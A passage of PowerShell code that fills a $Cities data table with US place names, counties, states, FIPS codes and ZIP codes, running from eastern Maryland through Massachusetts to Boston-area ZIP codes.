$Cities.Rows.Add("Stockton","Worcester","Maryland","MD","24","21864") + $null = $Cities.Rows.Add("Tyaskin","Wicomico","Maryland","MD","24","21865") + $null = $Cities.Rows.Add("Tylerton","Somerset","Maryland","MD","24","21866") + $null = $Cities.Rows.Add("Upper fairmount","Somerset","Maryland","MD","24","21867") + $null = $Cities.Rows.Add("Vienna","Dorchester","Maryland","MD","24","21869") + $null = $Cities.Rows.Add("Westover","Somerset","Maryland","MD","24","21871") + $null = $Cities.Rows.Add("Whaleysville","Worcester","Maryland","MD","24","21872") + $null = $Cities.Rows.Add("Willards","Wicomico","Maryland","MD","24","21874") + $null = $Cities.Rows.Add("Delmar","Wicomico","Maryland","MD","24","21875") + $null = $Cities.Rows.Add("Zcta 218hh","Dorchester","Maryland","MD","24","218HH") + $null = $Cities.Rows.Add("Zcta 218xx","Worcester","Maryland","MD","24","218XX") + $null = $Cities.Rows.Add("North east","Cecil","Maryland","MD","24","21901") + $null = $Cities.Rows.Add("Perry point","Cecil","Maryland","MD","24","21902") + $null = $Cities.Rows.Add("Perryville","Cecil","Maryland","MD","24","21903") + $null = $Cities.Rows.Add("Bainbridge","Cecil","Maryland","MD","24","21904") + $null = $Cities.Rows.Add("Rising sun","Cecil","Maryland","MD","24","21911") + $null = $Cities.Rows.Add("Warwick","Cecil","Maryland","MD","24","21912") + $null = $Cities.Rows.Add("Cecilton","Cecil","Maryland","MD","24","21913") + $null = $Cities.Rows.Add("Charlestown","Cecil","Maryland","MD","24","21914") + $null = $Cities.Rows.Add("Chesapeake city","Cecil","Maryland","MD","24","21915") + $null = $Cities.Rows.Add("Colora","Cecil","Maryland","MD","24","21917") + $null = $Cities.Rows.Add("Conowingo","Cecil","Maryland","MD","24","21918") + $null = $Cities.Rows.Add("Earleville","Cecil","Maryland","MD","24","21919") + $null = $Cities.Rows.Add("Elk mills","Cecil","Maryland","MD","24","21920") + $null = $Cities.Rows.Add("Elkton","Cecil","Maryland","MD","24","21921") + $null = $Cities.Rows.Add("Georgetown","Cecil","Maryland","MD","24","21930") + $null = $Cities.Rows.Add("Zcta 219hh","Cecil","Maryland","MD","24","219HH") + $null = $Cities.Rows.Add("Agawam","Hampden","Massachusetts","MA","25","01001") + $null = $Cities.Rows.Add("Cushman","Hampshire","Massachusetts","MA","25","01002") + $null = $Cities.Rows.Add("Barre","Worcester","Massachusetts","MA","25","01005") + $null = $Cities.Rows.Add("Belchertown","Hampshire","Massachusetts","MA","25","01007") + $null = $Cities.Rows.Add("Blandford","Hampden","Massachusetts","MA","25","01008") + $null = $Cities.Rows.Add("Brimfield","Hampden","Massachusetts","MA","25","01010") + $null = $Cities.Rows.Add("Chester","Hampden","Massachusetts","MA","25","01011") + $null = $Cities.Rows.Add("Chesterfield","Hampshire","Massachusetts","MA","25","01012") + $null = $Cities.Rows.Add("Chicopee","Hampden","Massachusetts","MA","25","01013") + $null = $Cities.Rows.Add("Chicopee","Hampden","Massachusetts","MA","25","01020") + $null = $Cities.Rows.Add("Westover afb","Hampden","Massachusetts","MA","25","01022") + $null = $Cities.Rows.Add("Cummington","Hampshire","Massachusetts","MA","25","01026") + $null = $Cities.Rows.Add("Mount tom","Hampshire","Massachusetts","MA","25","01027") + $null = $Cities.Rows.Add("East longmeadow","Hampden","Massachusetts","MA","25","01028") + $null = $Cities.Rows.Add("East otis","Berkshire","Massachusetts","MA","25","01029") + $null = $Cities.Rows.Add("Feeding hills","Hampden","Massachusetts","MA","25","01030") + $null = $Cities.Rows.Add("Gilbertville","Worcester","Massachusetts","MA","25","01031") + $null = $Cities.Rows.Add("Goshen","Hampshire","Massachusetts","MA","25","01032") + $null = $Cities.Rows.Add("Granby","Hampshire","Massachusetts","MA","25","01033") + $null = $Cities.Rows.Add("Tolland","Hampden","Massachusetts","MA","25","01034") + $null = $Cities.Rows.Add("Hadley","Hampshire","Massachusetts","MA","25","01035") + $null = $Cities.Rows.Add("Hampden","Hampden","Massachusetts","MA","25","01036") + $null = $Cities.Rows.Add("Hardwick","Worcester","Massachusetts","MA","25","01037") + $null = $Cities.Rows.Add("Hatfield","Hampshire","Massachusetts","MA","25","01038") + $null = $Cities.Rows.Add("Haydenville","Hampshire","Massachusetts","MA","25","01039") + $null = $Cities.Rows.Add("Holyoke","Hampden","Massachusetts","MA","25","01040") + $null = $Cities.Rows.Add("Huntington","Hampshire","Massachusetts","MA","25","01050") + $null = $Cities.Rows.Add("Leeds","Hampshire","Massachusetts","MA","25","01053") + $null = $Cities.Rows.Add("Leverett","Franklin","Massachusetts","MA","25","01054") + $null = $Cities.Rows.Add("Ludlow","Hampden","Massachusetts","MA","25","01056") + $null = $Cities.Rows.Add("Monson","Hampden","Massachusetts","MA","25","01057") + $null = $Cities.Rows.Add("Florence","Hampshire","Massachusetts","MA","25","01060") + $null = $Cities.Rows.Add("Zcta 01062","Hampshire","Massachusetts","MA","25","01062") + $null = $Cities.Rows.Add("Oakham","Worcester","Massachusetts","MA","25","01068") + $null = $Cities.Rows.Add("Palmer","Hampden","Massachusetts","MA","25","01069") + $null = $Cities.Rows.Add("Plainfield","Hampshire","Massachusetts","MA","25","01070") + $null = $Cities.Rows.Add("Russell","Hampden","Massachusetts","MA","25","01071") + $null = $Cities.Rows.Add("Shutesbury","Franklin","Massachusetts","MA","25","01072") + $null = $Cities.Rows.Add("Southampton","Hampshire","Massachusetts","MA","25","01073") + $null = $Cities.Rows.Add("South hadley","Hampshire","Massachusetts","MA","25","01075") + $null = $Cities.Rows.Add("Southwick","Hampden","Massachusetts","MA","25","01077") + $null = $Cities.Rows.Add("Three rivers","Hampden","Massachusetts","MA","25","01080") + $null = $Cities.Rows.Add("Wales","Hampden","Massachusetts","MA","25","01081") + $null = $Cities.Rows.Add("Ware","Hampshire","Massachusetts","MA","25","01082") + $null = $Cities.Rows.Add("Warren","Worcester","Massachusetts","MA","25","01083") + $null = $Cities.Rows.Add("West chesterfiel","Hampshire","Massachusetts","MA","25","01084") + $null = $Cities.Rows.Add("Montgomery","Hampden","Massachusetts","MA","25","01085") + $null = $Cities.Rows.Add("W hatfield","Hampshire","Massachusetts","MA","25","01088") + $null = $Cities.Rows.Add("West springfield","Hampden","Massachusetts","MA","25","01089") + $null = $Cities.Rows.Add("West warren","Worcester","Massachusetts","MA","25","01092") + $null = $Cities.Rows.Add("Wilbraham","Hampden","Massachusetts","MA","25","01095") + $null = $Cities.Rows.Add("Williamsburg","Hampshire","Massachusetts","MA","25","01096") + $null = $Cities.Rows.Add("Worthington","Hampshire","Massachusetts","MA","25","01098") + $null = $Cities.Rows.Add("Zcta 010hh","Franklin","Massachusetts","MA","25","010HH") + $null = $Cities.Rows.Add("Springfield","Hampden","Massachusetts","MA","25","01103") + $null = $Cities.Rows.Add("Springfield","Hampden","Massachusetts","MA","25","01104") + $null = $Cities.Rows.Add("Springfield","Hampden","Massachusetts","MA","25","01105") + $null = $Cities.Rows.Add("Longmeadow","Hampden","Massachusetts","MA","25","01106") + $null = $Cities.Rows.Add("Springfield","Hampden","Massachusetts","MA","25","01107") + $null = $Cities.Rows.Add("Springfield","Hampden","Massachusetts","MA","25","01108") + $null = $Cities.Rows.Add("Springfield","Hampden","Massachusetts","MA","25","01109") + $null = $Cities.Rows.Add("Springfield","Hampden","Massachusetts","MA","25","01118") + $null = $Cities.Rows.Add("Springfield","Hampden","Massachusetts","MA","25","01119") + $null = $Cities.Rows.Add("Springfield","Hampden","Massachusetts","MA","25","01128") + $null = $Cities.Rows.Add("Springfield","Hampden","Massachusetts","MA","25","01129") + $null = $Cities.Rows.Add("Indian orchard","Hampden","Massachusetts","MA","25","01151") + $null = $Cities.Rows.Add("Zcta 011hh","Hampden","Massachusetts","MA","25","011HH") + $null = $Cities.Rows.Add("Pittsfield","Berkshire","Massachusetts","MA","25","01201") + $null = $Cities.Rows.Add("Adams","Berkshire","Massachusetts","MA","25","01220") + $null = $Cities.Rows.Add("Ashley falls","Berkshire","Massachusetts","MA","25","01222") + $null = $Cities.Rows.Add("Becket","Berkshire","Massachusetts","MA","25","01223") + $null = $Cities.Rows.Add("Cheshire","Berkshire","Massachusetts","MA","25","01225") + $null = $Cities.Rows.Add("Dalton","Berkshire","Massachusetts","MA","25","01226") + $null = $Cities.Rows.Add("Great barrington","Berkshire","Massachusetts","MA","25","01230") + $null = $Cities.Rows.Add("Peru","Berkshire","Massachusetts","MA","25","01235") + $null = $Cities.Rows.Add("Housatonic","Berkshire","Massachusetts","MA","25","01236") + $null = $Cities.Rows.Add("Hancock","Berkshire","Massachusetts","MA","25","01237") + $null = $Cities.Rows.Add("Lee","Berkshire","Massachusetts","MA","25","01238") + $null = $Cities.Rows.Add("Lenox","Berkshire","Massachusetts","MA","25","01240") + $null = $Cities.Rows.Add("Lenox dale","Berkshire","Massachusetts","MA","25","01242") + $null = $Cities.Rows.Add("Mill river","Berkshire","Massachusetts","MA","25","01244") + $null = $Cities.Rows.Add("West otis","Berkshire","Massachusetts","MA","25","01245") + $null = $Cities.Rows.Add("Clarksburg","Berkshire","Massachusetts","MA","25","01247") + $null = $Cities.Rows.Add("Otis","Berkshire","Massachusetts","MA","25","01253") + $null = $Cities.Rows.Add("Richmond","Berkshire","Massachusetts","MA","25","01254") + $null = $Cities.Rows.Add("Sandisfield","Berkshire","Massachusetts","MA","25","01255") + $null = $Cities.Rows.Add("Savoy","Berkshire","Massachusetts","MA","25","01256") + $null = $Cities.Rows.Add("Sheffield","Berkshire","Massachusetts","MA","25","01257") + $null = $Cities.Rows.Add("South egremont","Berkshire","Massachusetts","MA","25","01258") + $null = $Cities.Rows.Add("Southfield","Berkshire","Massachusetts","MA","25","01259") + $null = $Cities.Rows.Add("Stockbridge","Berkshire","Massachusetts","MA","25","01262") + $null = $Cities.Rows.Add("Tyringham","Berkshire","Massachusetts","MA","25","01264") + $null = $Cities.Rows.Add("West stockbridge","Berkshire","Massachusetts","MA","25","01266") + $null = $Cities.Rows.Add("Williamstown","Berkshire","Massachusetts","MA","25","01267") + $null = $Cities.Rows.Add("Zcta 012hh","Berkshire","Massachusetts","MA","25","012HH") + $null = $Cities.Rows.Add("Leyden","Franklin","Massachusetts","MA","25","01301") + $null = $Cities.Rows.Add("Ashfield","Franklin","Massachusetts","MA","25","01330") + $null = $Cities.Rows.Add("New salem","Worcester","Massachusetts","MA","25","01331") + $null = $Cities.Rows.Add("Leyden","Franklin","Massachusetts","MA","25","01337") + $null = $Cities.Rows.Add("Buckland","Franklin","Massachusetts","MA","25","01338") + $null = $Cities.Rows.Add("Hawley","Franklin","Massachusetts","MA","25","01339") + $null = $Cities.Rows.Add("Colrain","Franklin","Massachusetts","MA","25","01340") + $null = $Cities.Rows.Add("Conway","Franklin","Massachusetts","MA","25","01341") + $null = $Cities.Rows.Add("Deerfield","Franklin","Massachusetts","MA","25","01342") + $null = $Cities.Rows.Add("Erving","Franklin","Massachusetts","MA","25","01344") + $null = $Cities.Rows.Add("Heath","Franklin","Massachusetts","MA","25","01346") + $null = $Cities.Rows.Add("Millers falls","Franklin","Massachusetts","MA","25","01349") + $null = $Cities.Rows.Add("Monroe","Franklin","Massachusetts","MA","25","01350") + $null = $Cities.Rows.Add("Montague","Franklin","Massachusetts","MA","25","01351") + $null = $Cities.Rows.Add("New salem","Franklin","Massachusetts","MA","25","01355") + $null = $Cities.Rows.Add("Northfield","Franklin","Massachusetts","MA","25","01360") + $null = $Cities.Rows.Add("New salem","Franklin","Massachusetts","MA","25","01364") + $null = $Cities.Rows.Add("Petersham","Worcester","Massachusetts","MA","25","01366") + $null = $Cities.Rows.Add("Rowe","Franklin","Massachusetts","MA","25","01367") + $null = $Cities.Rows.Add("Royalston","Worcester","Massachusetts","MA","25","01368") + $null = $Cities.Rows.Add("Shelburne falls","Franklin","Massachusetts","MA","25","01370") + $null = $Cities.Rows.Add("South deerfield","Franklin","Massachusetts","MA","25","01373") + $null = $Cities.Rows.Add("Sunderland","Franklin","Massachusetts","MA","25","01375") + $null = $Cities.Rows.Add("Turners falls","Franklin","Massachusetts","MA","25","01376") + $null = $Cities.Rows.Add("Warwick","Franklin","Massachusetts","MA","25","01378") + $null = $Cities.Rows.Add("Wendell","Franklin","Massachusetts","MA","25","01379") + $null = $Cities.Rows.Add("Wendell depot","Franklin","Massachusetts","MA","25","01380") + $null = $Cities.Rows.Add("Zcta 013hh","Franklin","Massachusetts","MA","25","013HH") + $null = $Cities.Rows.Add("Fitchburg","Worcester","Massachusetts","MA","25","01420") + $null = $Cities.Rows.Add("Ashburnham","Worcester","Massachusetts","MA","25","01430") + $null = $Cities.Rows.Add("Ashby","Middlesex","Massachusetts","MA","25","01431") + $null = $Cities.Rows.Add("Ayer","Middlesex","Massachusetts","MA","25","01432") + $null = $Cities.Rows.Add("Baldwinville","Worcester","Massachusetts","MA","25","01436") + $null = $Cities.Rows.Add("East templeton","Worcester","Massachusetts","MA","25","01438") + $null = $Cities.Rows.Add("Gardner","Worcester","Massachusetts","MA","25","01440") + $null = $Cities.Rows.Add("Groton","Middlesex","Massachusetts","MA","25","01450") + $null = $Cities.Rows.Add("Harvard","Worcester","Massachusetts","MA","25","01451") + $null = $Cities.Rows.Add("Hubbardston","Worcester","Massachusetts","MA","25","01452") + $null = $Cities.Rows.Add("Leominster","Worcester","Massachusetts","MA","25","01453") + $null = $Cities.Rows.Add("Littleton","Middlesex","Massachusetts","MA","25","01460") + $null = $Cities.Rows.Add("Lunenburg","Worcester","Massachusetts","MA","25","01462") + $null = $Cities.Rows.Add("Pepperell","Middlesex","Massachusetts","MA","25","01463") + $null = $Cities.Rows.Add("Shirley center","Middlesex","Massachusetts","MA","25","01464") + $null = $Cities.Rows.Add("Still river","Worcester","Massachusetts","MA","25","01467") + $null = $Cities.Rows.Add("Templeton","Worcester","Massachusetts","MA","25","01468") + $null = $Cities.Rows.Add("Townsend","Middlesex","Massachusetts","MA","25","01469") + $null = $Cities.Rows.Add("Westminster","Worcester","Massachusetts","MA","25","01473") + $null = $Cities.Rows.Add("W townsend","Middlesex","Massachusetts","MA","25","01474") + $null = $Cities.Rows.Add("Winchendon","Worcester","Massachusetts","MA","25","01475") + $null = $Cities.Rows.Add("Zcta 014hh","Worcester","Massachusetts","MA","25","014HH") + $null = $Cities.Rows.Add("Auburn","Worcester","Massachusetts","MA","25","01501") + $null = $Cities.Rows.Add("Berlin","Worcester","Massachusetts","MA","25","01503") + $null = $Cities.Rows.Add("Blackstone","Worcester","Massachusetts","MA","25","01504") + $null = $Cities.Rows.Add("Boylston","Worcester","Massachusetts","MA","25","01505") + $null = $Cities.Rows.Add("Brookfield","Worcester","Massachusetts","MA","25","01506") + $null = $Cities.Rows.Add("Charlton","Worcester","Massachusetts","MA","25","01507") + $null = $Cities.Rows.Add("Clinton","Worcester","Massachusetts","MA","25","01510") + $null = $Cities.Rows.Add("East brookfield","Worcester","Massachusetts","MA","25","01515") + $null = $Cities.Rows.Add("East douglas","Worcester","Massachusetts","MA","25","01516") + $null = $Cities.Rows.Add("Fiskdale","Worcester","Massachusetts","MA","25","01518") + $null = $Cities.Rows.Add("Grafton","Worcester","Massachusetts","MA","25","01519") + $null = $Cities.Rows.Add("Holden","Worcester","Massachusetts","MA","25","01520") + $null = $Cities.Rows.Add("Holland","Hampden","Massachusetts","MA","25","01521") + $null = $Cities.Rows.Add("Jefferson","Worcester","Massachusetts","MA","25","01522") + $null = $Cities.Rows.Add("Lancaster","Worcester","Massachusetts","MA","25","01523") + $null = $Cities.Rows.Add("Leicester","Worcester","Massachusetts","MA","25","01524") + $null = $Cities.Rows.Add("Millbury","Worcester","Massachusetts","MA","25","01527") + $null = $Cities.Rows.Add("Millville","Worcester","Massachusetts","MA","25","01529") + $null = $Cities.Rows.Add("New braintree","Worcester","Massachusetts","MA","25","01531") + $null = $Cities.Rows.Add("Northborough","Worcester","Massachusetts","MA","25","01532") + $null = $Cities.Rows.Add("Northbridge","Worcester","Massachusetts","MA","25","01534") + $null = $Cities.Rows.Add("North brookfield","Worcester","Massachusetts","MA","25","01535") + $null = $Cities.Rows.Add("North grafton","Worcester","Massachusetts","MA","25","01536") + $null = $Cities.Rows.Add("North oxford","Worcester","Massachusetts","MA","25","01537") + $null = $Cities.Rows.Add("Oxford","Worcester","Massachusetts","MA","25","01540") + $null = $Cities.Rows.Add("Princeton","Worcester","Massachusetts","MA","25","01541") + $null = $Cities.Rows.Add("Rochdale","Worcester","Massachusetts","MA","25","01542") + $null = $Cities.Rows.Add("Rutland","Worcester","Massachusetts","MA","25","01543") + $null = $Cities.Rows.Add("Shrewsbury","Worcester","Massachusetts","MA","25","01545") + $null = $Cities.Rows.Add("Southbridge","Worcester","Massachusetts","MA","25","01550") + $null = $Cities.Rows.Add("South grafton","Worcester","Massachusetts","MA","25","01560") + $null = $Cities.Rows.Add("Spencer","Worcester","Massachusetts","MA","25","01562") + $null = $Cities.Rows.Add("Sterling","Worcester","Massachusetts","MA","25","01564") + $null = $Cities.Rows.Add("Sturbridge","Worcester","Massachusetts","MA","25","01566") + $null = $Cities.Rows.Add("West upton","Worcester","Massachusetts","MA","25","01568") + $null = $Cities.Rows.Add("Uxbridge","Worcester","Massachusetts","MA","25","01569") + $null = $Cities.Rows.Add("Dudley hill","Worcester","Massachusetts","MA","25","01570") + $null = $Cities.Rows.Add("Dudley","Worcester","Massachusetts","MA","25","01571") + $null = $Cities.Rows.Add("Westborough","Worcester","Massachusetts","MA","25","01581") + $null = $Cities.Rows.Add("West boylston","Worcester","Massachusetts","MA","25","01583") + $null = $Cities.Rows.Add("West brookfield","Worcester","Massachusetts","MA","25","01585") + $null = $Cities.Rows.Add("Whitinsville","Worcester","Massachusetts","MA","25","01588") + $null = $Cities.Rows.Add("Wilkinsonville","Worcester","Massachusetts","MA","25","01590") + $null = $Cities.Rows.Add("Zcta 015hh","Worcester","Massachusetts","MA","25","015HH") + $null = $Cities.Rows.Add("Worcester","Worcester","Massachusetts","MA","25","01602") + $null = $Cities.Rows.Add("Worcester","Worcester","Massachusetts","MA","25","01603") + $null = $Cities.Rows.Add("Worcester","Worcester","Massachusetts","MA","25","01604") + $null = $Cities.Rows.Add("Worcester","Worcester","Massachusetts","MA","25","01605") + $null = $Cities.Rows.Add("Worcester","Worcester","Massachusetts","MA","25","01606") + $null = $Cities.Rows.Add("Worcester","Worcester","Massachusetts","MA","25","01607") + $null = $Cities.Rows.Add("Worcester","Worcester","Massachusetts","MA","25","01608") + $null = $Cities.Rows.Add("Worcester","Worcester","Massachusetts","MA","25","01609") + $null = $Cities.Rows.Add("Worcester","Worcester","Massachusetts","MA","25","01610") + $null = $Cities.Rows.Add("Cherry valley","Worcester","Massachusetts","MA","25","01611") + $null = $Cities.Rows.Add("Paxton","Worcester","Massachusetts","MA","25","01612") + $null = $Cities.Rows.Add("Zcta 016hh","Worcester","Massachusetts","MA","25","016HH") + $null = $Cities.Rows.Add("Framingham","Middlesex","Massachusetts","MA","25","01701") + $null = $Cities.Rows.Add("Zcta 01702","Middlesex","Massachusetts","MA","25","01702") + $null = $Cities.Rows.Add("Village of nagog","Middlesex","Massachusetts","MA","25","01718") + $null = $Cities.Rows.Add("Boxboro","Middlesex","Massachusetts","MA","25","01719") + $null = $Cities.Rows.Add("Acton","Middlesex","Massachusetts","MA","25","01720") + $null = $Cities.Rows.Add("Ashland","Middlesex","Massachusetts","MA","25","01721") + $null = $Cities.Rows.Add("Bedford","Middlesex","Massachusetts","MA","25","01730") + $null = $Cities.Rows.Add("Hanscom afb","Middlesex","Massachusetts","MA","25","01731") + $null = $Cities.Rows.Add("Bolton","Worcester","Massachusetts","MA","25","01740") + $null = $Cities.Rows.Add("Carlisle","Middlesex","Massachusetts","MA","25","01741") + $null = $Cities.Rows.Add("Concord","Middlesex","Massachusetts","MA","25","01742") + $null = $Cities.Rows.Add("Southborough","Worcester","Massachusetts","MA","25","01745") + $null = $Cities.Rows.Add("Holliston","Middlesex","Massachusetts","MA","25","01746") + $null = $Cities.Rows.Add("Hopedale","Worcester","Massachusetts","MA","25","01747") + $null = $Cities.Rows.Add("Hopkinton","Middlesex","Massachusetts","MA","25","01748") + $null = $Cities.Rows.Add("Hudson","Middlesex","Massachusetts","MA","25","01749") + $null = $Cities.Rows.Add("Marlborough","Middlesex","Massachusetts","MA","25","01752") + $null = $Cities.Rows.Add("Maynard","Middlesex","Massachusetts","MA","25","01754") + $null = $Cities.Rows.Add("Mendon","Worcester","Massachusetts","MA","25","01756") + $null = $Cities.Rows.Add("Milford","Worcester","Massachusetts","MA","25","01757") + $null = $Cities.Rows.Add("Natick","Middlesex","Massachusetts","MA","25","01760") + $null = $Cities.Rows.Add("Sherborn","Middlesex","Massachusetts","MA","25","01770") + $null = $Cities.Rows.Add("Southborough","Worcester","Massachusetts","MA","25","01772") + $null = $Cities.Rows.Add("Lincoln","Middlesex","Massachusetts","MA","25","01773") + $null = $Cities.Rows.Add("Stow","Middlesex","Massachusetts","MA","25","01775") + $null = $Cities.Rows.Add("Sudbury","Middlesex","Massachusetts","MA","25","01776") + $null = $Cities.Rows.Add("Wayland","Middlesex","Massachusetts","MA","25","01778") + $null = $Cities.Rows.Add("Woburn","Middlesex","Massachusetts","MA","25","01801") + $null = $Cities.Rows.Add("Burlington","Middlesex","Massachusetts","MA","25","01803") + $null = $Cities.Rows.Add("Andover","Essex","Massachusetts","MA","25","01810") + $null = $Cities.Rows.Add("Billerica","Middlesex","Massachusetts","MA","25","01821") + $null = $Cities.Rows.Add("South chelmsford","Middlesex","Massachusetts","MA","25","01824") + $null = $Cities.Rows.Add("Dracut","Middlesex","Massachusetts","MA","25","01826") + $null = $Cities.Rows.Add("Dunstable","Middlesex","Massachusetts","MA","25","01827") + $null = $Cities.Rows.Add("Haverhill","Essex","Massachusetts","MA","25","01830") + $null = $Cities.Rows.Add("Haverhill","Essex","Massachusetts","MA","25","01832") + $null = $Cities.Rows.Add("Georgetown","Essex","Massachusetts","MA","25","01833") + $null = $Cities.Rows.Add("Groveland","Essex","Massachusetts","MA","25","01834") + $null = $Cities.Rows.Add("Bradford","Essex","Massachusetts","MA","25","01835") + $null = $Cities.Rows.Add("Lawrence","Essex","Massachusetts","MA","25","01840") + $null = $Cities.Rows.Add("Lawrence","Essex","Massachusetts","MA","25","01841") + $null = $Cities.Rows.Add("Lawrence","Essex","Massachusetts","MA","25","01843") + $null = $Cities.Rows.Add("Methuen","Essex","Massachusetts","MA","25","01844") + $null = $Cities.Rows.Add("North andover","Essex","Massachusetts","MA","25","01845") + $null = $Cities.Rows.Add("Lowell","Middlesex","Massachusetts","MA","25","01850") + $null = $Cities.Rows.Add("Lowell","Middlesex","Massachusetts","MA","25","01851") + $null = $Cities.Rows.Add("Lowell","Middlesex","Massachusetts","MA","25","01852") + $null = $Cities.Rows.Add("Lowell","Middlesex","Massachusetts","MA","25","01854") + $null = $Cities.Rows.Add("Merrimac","Essex","Massachusetts","MA","25","01860") + $null = $Cities.Rows.Add("North billerica","Middlesex","Massachusetts","MA","25","01862") + $null = $Cities.Rows.Add("North chelmsford","Middlesex","Massachusetts","MA","25","01863") + $null = $Cities.Rows.Add("North reading","Middlesex","Massachusetts","MA","25","01864") + $null = $Cities.Rows.Add("Reading","Middlesex","Massachusetts","MA","25","01867") + $null = $Cities.Rows.Add("Tewksbury","Middlesex","Massachusetts","MA","25","01876") + $null = $Cities.Rows.Add("Tyngsboro","Middlesex","Massachusetts","MA","25","01879") + $null = $Cities.Rows.Add("Wakefield","Middlesex","Massachusetts","MA","25","01880") + $null = $Cities.Rows.Add("Graniteville","Middlesex","Massachusetts","MA","25","01886") + $null = $Cities.Rows.Add("Wilmington","Middlesex","Massachusetts","MA","25","01887") + $null = $Cities.Rows.Add("Winchester","Middlesex","Massachusetts","MA","25","01890") + $null = $Cities.Rows.Add("Zcta 018hh","Essex","Massachusetts","MA","25","018HH") + $null = $Cities.Rows.Add("Lynn","Essex","Massachusetts","MA","25","01902") + $null = $Cities.Rows.Add("East lynn","Essex","Massachusetts","MA","25","01904") + $null = $Cities.Rows.Add("West lynn","Essex","Massachusetts","MA","25","01905") + $null = $Cities.Rows.Add("Saugus","Essex","Massachusetts","MA","25","01906") + $null = $Cities.Rows.Add("Swampscott","Essex","Massachusetts","MA","25","01907") + $null = $Cities.Rows.Add("Nahant","Essex","Massachusetts","MA","25","01908") + $null = $Cities.Rows.Add("Amesbury","Essex","Massachusetts","MA","25","01913") + $null = $Cities.Rows.Add("Beverly","Essex","Massachusetts","MA","25","01915") + $null = $Cities.Rows.Add("Boxford","Essex","Massachusetts","MA","25","01921") + $null = $Cities.Rows.Add("Byfield","Essex","Massachusetts","MA","25","01922") + $null = $Cities.Rows.Add("Danvers","Essex","Massachusetts","MA","25","01923") + $null = $Cities.Rows.Add("Essex","Essex","Massachusetts","MA","25","01929") + $null = $Cities.Rows.Add("Gloucester","Essex","Massachusetts","MA","25","01930") + $null = $Cities.Rows.Add("Ipswich","Essex","Massachusetts","MA","25","01938") + $null = $Cities.Rows.Add("Lynnfield","Essex","Massachusetts","MA","25","01940") + $null = $Cities.Rows.Add("Manchester","Essex","Massachusetts","MA","25","01944") + $null = $Cities.Rows.Add("Marblehead","Essex","Massachusetts","MA","25","01945") + $null = $Cities.Rows.Add("Middleton","Essex","Massachusetts","MA","25","01949") + $null = $Cities.Rows.Add("Newburyport","Essex","Massachusetts","MA","25","01950") + $null = $Cities.Rows.Add("Newbury","Essex","Massachusetts","MA","25","01951") + $null = $Cities.Rows.Add("Salisbury","Essex","Massachusetts","MA","25","01952") + $null = $Cities.Rows.Add("Peabody","Essex","Massachusetts","MA","25","01960") + $null = $Cities.Rows.Add("Rockport","Essex","Massachusetts","MA","25","01966") + $null = $Cities.Rows.Add("Rowley","Essex","Massachusetts","MA","25","01969") + $null = $Cities.Rows.Add("Salem","Essex","Massachusetts","MA","25","01970") + $null = $Cities.Rows.Add("South hamilton","Essex","Massachusetts","MA","25","01982") + $null = $Cities.Rows.Add("Topsfield","Essex","Massachusetts","MA","25","01983") + $null = $Cities.Rows.Add("Wenham","Essex","Massachusetts","MA","25","01984") + $null = $Cities.Rows.Add("West newbury","Essex","Massachusetts","MA","25","01985") + $null = $Cities.Rows.Add("Zcta 019hh","Essex","Massachusetts","MA","25","019HH") + $null = $Cities.Rows.Add("Bellingham","Norfolk","Massachusetts","MA","25","02019") + $null = $Cities.Rows.Add("Canton","Norfolk","Massachusetts","MA","25","02021") + $null = $Cities.Rows.Add("Cohasset","Norfolk","Massachusetts","MA","25","02025") + $null = $Cities.Rows.Add("Dedham","Norfolk","Massachusetts","MA","25","02026") + $null = $Cities.Rows.Add("Dover","Norfolk","Massachusetts","MA","25","02030") + $null = $Cities.Rows.Add("East walpole","Norfolk","Massachusetts","MA","25","02032") + $null = $Cities.Rows.Add("Foxboro","Norfolk","Massachusetts","MA","25","02035") + $null = $Cities.Rows.Add("Franklin","Norfolk","Massachusetts","MA","25","02038") + $null = $Cities.Rows.Add("Hingham","Plymouth","Massachusetts","MA","25","02043") + $null = $Cities.Rows.Add("Hull","Plymouth","Massachusetts","MA","25","02045") + $null = $Cities.Rows.Add("Mansfield","Bristol","Massachusetts","MA","25","02048") + $null = $Cities.Rows.Add("Marshfield","Plymouth","Massachusetts","MA","25","02050") + $null = $Cities.Rows.Add("Medfield","Norfolk","Massachusetts","MA","25","02052") + $null = $Cities.Rows.Add("Medway","Norfolk","Massachusetts","MA","25","02053") + $null = $Cities.Rows.Add("Millis","Norfolk","Massachusetts","MA","25","02054") + $null = $Cities.Rows.Add("Norfolk","Norfolk","Massachusetts","MA","25","02056") + $null = $Cities.Rows.Add("Norwell","Plymouth","Massachusetts","MA","25","02061") + $null = $Cities.Rows.Add("Norwood","Norfolk","Massachusetts","MA","25","02062") + $null = $Cities.Rows.Add("Scituate","Plymouth","Massachusetts","MA","25","02066") + $null = $Cities.Rows.Add("Sharon","Norfolk","Massachusetts","MA","25","02067") + $null = $Cities.Rows.Add("South walpole","Norfolk","Massachusetts","MA","25","02071") + $null = $Cities.Rows.Add("Stoughton","Norfolk","Massachusetts","MA","25","02072") + $null = $Cities.Rows.Add("Walpole","Norfolk","Massachusetts","MA","25","02081") + $null = $Cities.Rows.Add("Westwood","Norfolk","Massachusetts","MA","25","02090") + $null = $Cities.Rows.Add("Wrentham","Norfolk","Massachusetts","MA","25","02093") + $null = $Cities.Rows.Add("Zcta 020hh","Norfolk","Massachusetts","MA","25","020HH") + $null = $Cities.Rows.Add("Boston","Suffolk","Massachusetts","MA","25","02108") + $null = $Cities.Rows.Add("Boston","Suffolk","Massachusetts","MA","25","02109") + $null = $Cities.Rows.Add("Boston","Suffolk","Massachusetts","MA","25","02110") + $null = $Cities.Rows.Add("Boston","Suffolk","Massachusetts","MA","25","02111") + $null = $Cities.Rows.Add("Boston","Suffolk","Massachusetts","MA","25","02113") + $null = $Cities.Rows.Add("Boston","Suffolk","Massachusetts","MA","25","02114") + $null = $Cities.Rows.Add("Boston","Suffolk","Massachusetts","MA","25","02115") + $null = $Cities.Rows.Add("Boston","Suffolk","Massachusetts","MA","25","02116") + $null = $Cities.Rows.Add("Roxbury","Suffolk","Massachusetts","MA","25","02118") + $null = $Cities.Rows.Add("Roxbury","Suffolk","Massachusetts","MA","25","02119") + $null = $Cities.Rows.Add("Roxbury","Suffolk","Massachusetts","MA","25","02120") + $null = $Cities.Rows.Add("Dorchester","Suffolk","Massachusetts","MA","25","02121") + $null = $Cities.Rows.Add("Dorchester","Suffolk","Massachusetts","MA","25","02122") + $null = $Cities.Rows.Add("Dorchester","Suffolk","Massachusetts","MA","25","02124") + $null = $Cities.Rows.Add("Dorchester","Suffolk","Massachusetts","MA","25","02125") + $null = 